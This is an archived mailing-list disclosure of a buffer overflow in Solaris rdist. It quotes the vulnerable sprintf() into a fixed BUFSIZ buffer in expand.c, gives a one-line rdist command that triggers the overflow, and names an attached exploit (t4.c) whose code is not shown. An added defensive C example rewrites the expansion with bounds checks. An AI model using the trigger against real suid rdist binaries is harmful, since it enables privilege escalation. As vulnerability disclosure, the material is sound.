Enclosed is an exploit for a hole in Solaris rdist that I believe the patch #105667-01 addresses. That patch is for 2.6. I've personally tested the exploit on 2.6, 2.5.1, and 2.5 machines. I'm not sure if that is the right patch, but I'm pretty sure this hole has been fixed.

You can see the hole if you look at the bsd source for rdist, which is apparently pretty similar to the code Sun used. The vulnerability is in expand.c, which you can look at here:

http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c?rev=1.5

Part of the program's functionality is to allow a user to define variables and reference them in a way similar to environment variables. The problem comes in when the program attempts to substitute the symbol representing the variable with its value. You should be able to see this by doing:

    rdist -d bleh=AAAAA(lotsa lotsa A's) -c /tmp/ '${bleh}'

In the function expstr(), we have

    if (tp != NULL) {
        for (; tp != NULL; tp = tp->n_next) {
            (void) sprintf((char *)ebuf, "%s%s%s", s, tp->n_name, tail);
            expstr(ebuf);
        }
        return;
    }

A little higher in the code, we see:

    u_char ebuf[BUFSIZ];

This is obviously a bad thing.

BTW, none of the bsds or linuxs are vulnerable to any rdist hole to the best of my knowledge because the binary isn't suid.

My nick used to be humble, but as of reading bugtraq yesterday, I can see that someone else is partial to the name. In order to alleviate confusion, (and to possibly deflect emails about how to "run ufsrestore.c" to him :p), I'll change my nick. And looking at this last post, I don't think I want to inherit his enemies.
:> horizon

[Attachment: t4.c]
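
The unbounded sprintf() into ebuf[BUFSIZ] described in the post, rewritten with a length check: this is an added example, not code from the original post, from rdist, or from Sun's patch. The names expand_checked, struct var and demo_oversized are hypothetical, and the sample variable value is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for rdist's variable list; not the real struct. */
struct var { const char *name; const char *value; };

/*
 * Expand the first ${name} in s into out, never writing more than outsz bytes.
 * Returns 0 on success, -1 for an unknown or unterminated variable, and
 * -2 when prefix + value + tail would not fit (the case sprintf() ignores).
 */
int expand_checked(char *out, size_t outsz, const char *s,
                   const struct var *vars, size_t nvars)
{
    const char *start = strstr(s, "${");
    if (start == NULL) {                 /* nothing to expand: bounded copy */
        int n = snprintf(out, outsz, "%s", s);
        return (n < 0 || (size_t)n >= outsz) ? -2 : 0;
    }
    const char *end = strchr(start + 2, '}');
    if (end == NULL)
        return -1;
    size_t namelen = (size_t)(end - (start + 2));
    for (size_t i = 0; i < nvars; i++) {
        if (strlen(vars[i].name) != namelen ||
            strncmp(vars[i].name, start + 2, namelen) != 0)
            continue;
        /* Same "%s%s%s" shape as the quoted call, but length-checked. */
        int n = snprintf(out, outsz, "%.*s%s%s",
                         (int)(start - s), s, vars[i].value, end + 1);
        return (n < 0 || (size_t)n >= outsz) ? -2 : 0;
    }
    return -1;
}

/* Constructed input: a value twice the buffer size, like the -d test above. */
int demo_oversized(void)
{
    static char big[BUFSIZ * 2];
    char out[BUFSIZ];                    /* same size as the quoted ebuf[] */
    memset(big, 'A', sizeof big - 1);    /* last byte stays '\0' */
    struct var v = { "bleh", big };
    return expand_checked(out, sizeof out, "${bleh}", &v, 1);
}

int main(void)
{
    printf("oversized expansion -> %d\n", demo_oversized());
    return 0;
}
```

A caller should treat the -2 return as a hard error and stop, rather than continue with a truncated expansion.
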
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:12:27 PDT